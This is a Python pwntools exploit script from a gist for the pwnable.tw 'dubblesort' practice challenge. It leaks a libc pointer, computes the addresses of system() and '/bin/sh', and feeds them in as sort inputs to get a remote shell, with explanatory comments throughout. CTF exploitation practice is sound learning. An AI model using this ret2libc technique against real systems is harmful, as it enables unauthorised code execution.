@bin2415
Created June 22, 2018 08:37
pwnable.tw dubblesort
from pwn import *
# Solve script for the pwnable.tw "dubblesort" challenge (see the gist title).
#
# Flow, as far as the script itself shows it:
#   1. read symbol/string offsets out of the libc shipped with the challenge;
#   2. connect, answer the name prompt and pull a 32-bit value out of the reply;
#   3. treat that value as a libc pointer, subtract a fixed offset to get the
#      libc base, and rebase `system` and the "/bin/sh" string;
#   4. feed the program 36 "numbers", the last of which are those addresses;
#   5. drop into an interactive session.
#
# Defender's reading: every address the script needs is derived from ONE
# leaked pointer plus constants taken from the known libc build, which is why
# a single pointer disclosure is enough to defeat ASLR when the library
# version is predictable. The constants (0x1ae244, the 34:38 byte slice, the
# 36/24/7/3 counts) are specific to this binary and libc; they are not
# explained in the script and are not general.
#
# Written against Python 2 era pwntools: payloads are `str`, not `bytes`.

# libc that the challenge distributes; all offsets below come from it.
libc = ELF('./libc.so.6')
binsh_addr = 0
# Offset of the first "/bin/sh\0" string inside libc; only the first hit is kept.
for address in libc.search('/bin/sh\x00'):
    print(address)
    binsh_addr = address
    break
# Offset of system() inside libc.
system_addr = libc.functions['system'].address
#p = process("./dubblesort", env={"LD_PRELOAD" : "./libc.so.6"})
# Remote target of the challenge (host/port as given in the original script).
p = remote('chall.pwnable.tw', 10101)
# NOTE(review): leftover from the local `process(...)` variant above;
# presumably yields no pid for a remote connection.
print("pid " + str(proc.pidof(p)))
#raw_input("waiting attach")
#gdb.attach(p, '''
# break *(main+0xF0)''')
p.recvuntil("What your name :")
# Name input: 27 filler bytes followed by the newline that ends the line.
payload1 = 'A' * 27
payload1 += '\n'
p.send(payload1)
# assumes the whole reply arrives in one read; recv() only returns what is
# currently buffered.
recvStr = p.recv()
print(recvStr)
# Bytes 34..38 of the reply are decoded as a little-endian 32-bit value and
# treated as a pointer into libc.
addr = recvStr[34:38]
addr_num = u32(addr)
print("the leaked address is " + str(hex(addr_num)))
# Fixed distance from the leaked pointer to the libc base for this libc build.
base_addr = addr_num - 0x1ae244
#print("system addr is ", system_addr)
# Rebase the two libc offsets onto the running process.
system_addr2 = system_addr + base_addr
binsh_addr2 = binsh_addr + base_addr
# NOTE(review): both offsets are defined but never used below.
ret_offset = 0x80
canary_offset = 0x60
#p.recvuntil(' sort :')
print('hello')
# Number of values the program is told to expect: 24 + 1 + 8 + 3 = 36.
p.sendline('36')
# Values 1..24: a harmless constant.
for i in range(24):
    print(p.recvuntil('number :'))
    p.sendline('10')
# Value 25: the literal '+' instead of a number; the script does not say why
# this particular input is used.
print(p.recvuntil('number :'))
p.sendline('+')
# Values 26..33: the rebased address of system() (7 in the loop + 1 below).
for i in range(7):
    print(p.recvuntil('number :'))
    p.sendline(str(system_addr2))
p.recvuntil('number :')
p.sendline(str(system_addr2))
print("system address is " + str(system_addr2))
# Values 34..36: the rebased address of the "/bin/sh" string.
p.recvuntil('number :')
p.sendline(str(binsh_addr2))
p.recvuntil('number :')
p.sendline(str(binsh_addr2))
p.recvuntil('number :')
p.sendline(str(binsh_addr2))
# Hand the connection to the user.
p.interactive()